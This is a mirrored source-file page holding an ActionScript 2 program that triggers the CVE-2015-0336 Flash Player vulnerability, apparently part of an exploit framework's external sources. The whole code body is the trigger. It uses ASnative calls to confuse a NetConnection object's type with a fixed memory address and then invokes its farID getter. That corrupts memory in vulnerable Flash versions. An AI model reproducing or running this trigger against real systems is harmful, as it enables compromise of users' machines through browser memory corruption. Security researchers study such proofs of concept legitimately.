Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/external/source/exploits/CVE-2015-0336/TriggerLinux/src/Main.as
Views: 11788
// Build with FlashDevelop, its command line is: // fdbuild.exe "Trigger.as2proj" -ipc 22ef73b0-fe1e-4cd0-8363-4650575d43b6 -version "1.14" -compiler "C:\Program Files\FlashDevelop\Tools\mtasc" -notrace -library "C:\Program Files\FlashDevelop\Library" class Main { public static function main(swfRoot:MovieClip):Void { var _loc2_ = _global.ASnative(2100, 0x956c2000); var _loc3_ = new Object(); _loc2_.__proto__ = _loc3_; _global.ASnative(2100, 200)(_loc3_); //Netconnection constructor _global.ASnative(2100, 8).apply(_loc2_, [1]); //NetConnection.farID } public function Main() { } }